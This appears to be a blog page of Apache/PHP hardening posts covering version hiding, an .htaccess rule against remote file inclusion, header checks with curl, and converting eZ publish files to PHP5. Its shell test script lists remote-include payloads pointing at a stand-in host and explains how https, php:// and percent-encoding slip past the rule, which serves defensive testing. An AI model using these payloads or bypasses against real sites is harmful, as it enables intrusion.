Version Hiding for Server and Application Security

One of the easiest ways to make a server or application more secure is to reduce the publicly accessible information about it. Hiding a version string does not fix a vulnerable version; it only makes fingerprinting cost more, so it complements patching rather than replacing it.

The above link describes how version information can be suppressed in the HTTP headers (in Apache, ServerTokens Prod and ServerSignature Off; in php.ini, expose_php = Off) to make it more difficult for people to identify the version of the server software and the version of PHP you are running.

The same principle applies to applications. Any tag in the HTML that exposes a version, such as the meta generator tag that many content management systems emit, should be suppressed.

md5('just_a_test')

With sincere thanks to the associated URL, this is .htaccess code that can be used with b2evolution to deny access to requestors who include http: or ftp: on the query string. This is slightly different than the other post - it seems to be working. [L,F] didn’t work as I would have liked.

.htaccess

Code

RewriteEngine On
# Send any request whose query string contains a parameter value that
# begins with http:// or ftp:// to the 403 page. [NC] makes the match
# case-insensitive. Note that https:// is not matched by this pattern.
RewriteCond %{QUERY_STRING} ^.*=(ht|f)tp\://.*$ [NC]
RewriteRule ^.*$ 403.php [L]
 
 
# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like:  http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^.*$ index.php [L]

403.php

Code

<?php
// Answer with a bare 403 and stop; nothing else should be sent.
header('HTTP/1.1 403 Forbidden');
exit;
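To see exactly what this rule does and does not stop, here is an added shell example (my code, not from the post or from b2evolution) that replays the RewriteCond pattern against constructed query strings with grep. The stricter pattern, the function names and the sample query strings are my own suggestions, not part of the original .htaccess.

```shell
#!/bin/sh
# Added example, not code from the original post. It replays the
# RewriteCond pattern from the .htaccess above against constructed
# query strings, so you can see what the rule catches and what gets past
# it. Assumes POSIX sh and grep -E; no web server is needed.

# The pattern as written in the .htaccess, as an extended regex.
# Apache's [NC] flag corresponds to grep -i; the "\:" in the original is
# a redundant escape, ":" is not special in a regex.
RULE_PATTERN='^.*=(ht|f)tp://.*$'

# Exit status 0 when the rule would send the request to 403.php.
blocked_by_rule() {
    printf '%s\n' "$1" | grep -Eiq "$RULE_PATTERN"
}

# A stricter pattern (my suggestion, not from the post): refuse any
# parameter whose value starts with a URL scheme ("https:", "php:",
# "data:", ...) or a scheme-relative "//". The cost is that values such
# as "when=noon:30" are refused as well; tune it for your own parameters.
STRICT_PATTERN='(^|&)[^=&]*=([A-Za-z][A-Za-z0-9+.-]*:|//)'

blocked_by_strict() {
    printf '%s\n' "$1" | grep -Eiq "$STRICT_PATTERN"
}

# Constructed sample query strings: the first three are what the rule is
# meant to stop, the next three are remote-include attempts it misses,
# the last is an ordinary request.
demo() {
    for qs in 'page=http://evil.example/shell.txt' \
              'page=HTTP://evil.example/shell.txt' \
              'p=1&file=ftp://evil.example/shell.txt' \
              'page=https://evil.example/shell.txt' \
              'page=//evil.example/shell.txt' \
              'page=php://input' \
              'page=about.php'; do
        if blocked_by_rule "$qs"; then r=blocked; else r=allowed; fi
        if blocked_by_strict "$qs"; then s=blocked; else s=allowed; fi
        printf '%-40s rule: %-8s strict: %s\n' "$qs" "$r" "$s"
    done
}

demo
```

Run it with sh; it prints one line per sample. The original pattern only recognises http:// and ftp://, so https://, scheme-relative //host and php:// values pass straight through. Both patterns match the raw query string, which Apache does not URL-decode before the RewriteCond, so percent-encoding the scheme (%68ttp://) defeats them while PHP still decodes it to http:// in $_GET. Treat the rewrite as a tripwire; the real fix for remote file inclusion is to never build an include path from request data and to keep allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) off.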

I hope this is helpful.

Rapid Development Strategies

These are my rapid development strategies.

Front2Back

Works well for simple sites where the page layout is very important.

  1. Build the HTML/CSS framework of the screen
  2. Create navigation and page stubs
  3. Set up help, about, terms/privacy stubs
  4. Create a login screen (if necessary), that does nothing, and a logout. This helps to establish the logic flow.
  5. Build a home page
  6. Build pages out in a logical order (it will vary), again, front2back - start with the way it looks on the screen, then build the server side logic.

Back2Front

Works well when the complexity and risk are related to server-side logic and interfaces, or when there is a designer and developer on the project.

  1. Get the documentation, find the resources for the difficult parts
  2. Choose the simplest task, for example, submitting access credentials, and get it working.
  3. Define an object-oriented architecture and one class to support the requirements.
  4. Get the OO code interface working
  5. Break the OO code into two layers (if necessary), one a general interface, the other specific to the class.
  6. Clone the OO code for the remaining data types
  7. Create the view for one class, then use the same approach as before to define the display architecture. Strive to use only very basic HTML, so the design can be managed efficiently with CSS.
  8. Refine the interfaces to make integration easy.

curl

This is the second half of the prior post - how to find out what version of PHP is running on your server. Use curl with the -I (uppercase i) option, followed by the domain name, to get the HTTP headers. There are many options you can use with curl, and the server can be configured to suppress some of this information for improved security - so if you don't get the results you need, refer to the man pages and try again.

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2008 23:11:07 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.23 mod_deflate/1.0.21 mod_fastcgi/2.4.2 PHP/5.2.3 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.8 FrontPage/5.0.2.2634a mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.8
Content-Type: text/html
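Here is an added shell example (my code, not from the post) that turns the curl -I inspection above, and the version-hiding post at the top of the page, into a repeatable check: it takes the header block above as sample input, prints the headers that disclose versions and counts the distinct product/version tokens. The regular expression for a version token and the function names are my own; a live check needs network access.

```shell
#!/bin/sh
# Added example, not from the original post. It checks a set of HTTP
# response headers, as printed by "curl -I", for product/version
# disclosure, the kind the version-hiding post above says to suppress.
# Assumes POSIX sh, grep, sort, tr, wc and (for a live check) curl.

# The header block from the curl run above, used here as sample input.
SAMPLE_HEADERS=$(cat <<'EOF'
HTTP/1.1 200 OK
Date: Fri, 21 Mar 2008 23:11:07 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.23 mod_deflate/1.0.21 mod_fastcgi/2.4.2 PHP/5.2.3 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.8 FrontPage/5.0.2.2634a mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.8
Content-Type: text/html
EOF
)

# Print the headers that carry a name/version token such as Apache/1.3.41.
# Reads headers on stdin; strips the CR that real responses end lines with.
leaking_headers() {
    tr -d '\r' | grep -Ei '^(Server|X-Powered-By):' \
               | grep -E '[A-Za-z_-]+/[0-9]+(\.[0-9]+)*'
}

# Count the distinct product/version tokens, ignoring the HTTP/1.1 status
# line. A hardened server (ServerTokens Prod, expose_php = Off) should
# bring this to 0.
count_version_tokens() {
    tr -d '\r' | grep -Ev '^HTTP/' \
               | grep -Eo '[A-Za-z_-]+/[0-9]+(\.[0-9]+)*[A-Za-z]?' \
               | sort -u | wc -l | tr -d ' '
}

# Live check of one site, using curl -I as described in the post.
check_site() {
    curl -sSI "$1" | leaking_headers
}

if [ "$#" -gt 0 ]; then
    check_site "$1"
else
    printf '%s\n' "$SAMPLE_HEADERS" | leaking_headers
    printf 'distinct version tokens: %s\n' \
        "$(printf '%s\n' "$SAMPLE_HEADERS" | count_version_tokens)"
fi
```

Without arguments the script runs against the sample; with a URL it runs curl -I against that site. The sample headers show both PHP/5.2.3 and PHP/4.4.8 in the Server line and X-Powered-By naming 4.4.8 as the default handler, which is the PHP4-default, PHP5-by-extension setup the eZ publish post below deals with. After setting ServerTokens Prod, ServerSignature Off and expose_php = Off, the token count should drop to zero, which makes this a useful line in a deployment check.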

Another approach is to create one file, ver.php, containing the following, and a copy or symlink of it named ver.php5:

<?php
// Prints the version of the PHP interpreter that served this extension.
echo phpversion();

Request both URLs through a browser to see which version is used to deliver each extension. Remove the files again afterwards; they disclose exactly what the previous post tells you to hide.

Run eZ publish 4.0 on a server with PHP4 as the default and PHP5 available

My server has PHP4 as the default and PHP5 available, indicated by the extension .php5. eZ publish 4.0 requires PHP5. One approach is to get a list of the PHP files in the archive, like so:

tar tzf eztagcloud.tgz > php_file_list

Use grep and sed to create a script to rename the files, as follows:

grep '\.php$' php_file_list | sed 's/\(\(.*\)\.php\)$/mv "\1" "\2.php5"/' > php5

Make php5 executable:

chmod 700 php5

Untar the tar file:

tar xzf eztagcloud.tgz

Run php5:

./php5

Check by using:

ls -R eztagcloud | grep '\.php$'

This should print nothing; any name that still ends in .php was missed.

Change the filename.extension in the rewrite rules on the target from index.php to index.php5.

The include and require statements in the files must also be updated with the new extension. The file list extracted from the tar file can feed a second generated script of GNU sed commands that substitute .php5 for .php. Note that this substitutes every .php on a line, not only the ones inside include and require, and it must not be run twice (a second pass would produce .php55).

grep '\.php$' php_file_list | sed 's/\(\(.*\)\.php\)$/sed --in-place "s\/\\.php\/.php5\/g" "\15"/' > php52

Make php52 executable and run it the same way.
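The steps above as one runnable shell script, added here (this is my code, not the post's or eZ publish's). It renames the .php files and rewrites the include/require targets in place, and it only touches a .php that sits directly before a closing quote on an include or require line, which is narrower than the generated sed commands above. The sample tree it builds when run without arguments is constructed for illustration; the function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original post. It does in one script
# what the grep/sed pipelines above generate: rename every .php file under
# a directory to .php5 and rewrite include/require statements to match.
# Assumes POSIX sh, find, sed and mktemp. The sample tree is constructed
# here to show the result; point convert_tree at the real extracted
# directory instead.

# Rename every *.php under $1 to *.php5, printing the new names.
# sort buffers the whole find listing, so renaming does not disturb it.
rename_php_to_php5() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        mv -- "$f" "${f%.php}.php5"
        printf '%s\n' "${f%.php}.php5"
    done
}

# Rewrite the quoted path of include/require statements in one file from
# .php to .php5. Only ".php" immediately followed by a closing quote on a
# line that contains include/require is changed, so a ".php" inside a URL,
# comment or regex is left alone and running it twice is harmless.
fix_includes() {
    sed -E "/(include|require)(_once)?[[:space:](]/ s/\.php([\"'])/.php5\1/g" "$1" \
        > "$1.tmp" && mv -- "$1.tmp" "$1"
}

convert_tree() {
    rename_php_to_php5 "$1"
    find "$1" -type f -name '*.php5' | while IFS= read -r f; do
        fix_includes "$f"
    done
}

# Constructed sample: a small PHP tree with both include styles and a
# ".php" inside a string that must not be touched.
make_sample_tree() {
    mkdir -p "$1/app/lib"
    cat > "$1/app/index.php" <<'EOF'
<?php
require_once("lib/util.php");
include 'lib/db.php';
$link = "http://example.com/page.php";
echo greet();
EOF
    cat > "$1/app/lib/util.php" <<'EOF'
<?php
function greet() { return "hello"; }
EOF
    printf '<?php\n$db = null;\n' > "$1/app/lib/db.php"
}

if [ "$#" -gt 0 ]; then
    convert_tree "$1"
else
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    convert_tree "$tmp/app"
    cat "$tmp/app/index.php5"
    rm -rf "$tmp"
fi
```

Run it as sh convert.sh eztagcloud after extracting the archive (the script name is an assumption), then diff the tree against a fresh extraction before running the installer. It only handles file names and include paths; the rewrite rules and the settings/*.ini changes mentioned later in the post still have to be made by hand.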

If you don't have a lot of experience with eZ publish and LAMP, this entire post should be considered extremely risky. However, it will not take long to check the success or failure of this idea - so it is definitely worth a try. Apologies for not testing it fully.

This approach should work for any application, and you may want to reverse it - so PHP5 is the default language, and PHP4 is accessible by extension. Good luck.

This link has some great suggestions about how to use .htaccess to route all .php requests through PHP5. Set at the directory or account level, it may eliminate the renaming requirements. I couldn't do it on my server, but others may be able to use it. Thanks to the author.
http://corz.org/serv/tricks/htaccess.php

.htaccess file

php5_value date.timezone 'America/Chicago'
php_value allow_call_time_pass_reference 0
php5_value magic_quotes_gpc 0


# Deny every file by default ...
<FilesMatch ".">
order allow,deny
deny from all
</FilesMatch>

# ... then allow only the front controller, static assets and stored PDFs.
# index_treemenu.php5 is not in this list, so the treemenu rewrite below
# will be refused unless it is added here.
<FilesMatch "(index\.php5|\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf)$">
order allow,deny
allow from all
</FilesMatch>


RewriteEngine On
RewriteRule content/treemenu/?$ index_treemenu.php5
RewriteRule index_treemenu.php5 - [L]

# Everything that is not a static asset or stored PDF goes to the front controller
RewriteRule !\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf$ index.php5

DirectoryIndex index.php5

Run the installer - use .php5. Before you start fine tuning, be sure to change the extensions in settings/dbschema.ini and settings/codetemplates.ini.

Be sure to adhere to the requirements for eZ4, including eZ components, which can be processed with this approach as well.

*** This configuration is only intended for testing, production sites should be supported appropriately ***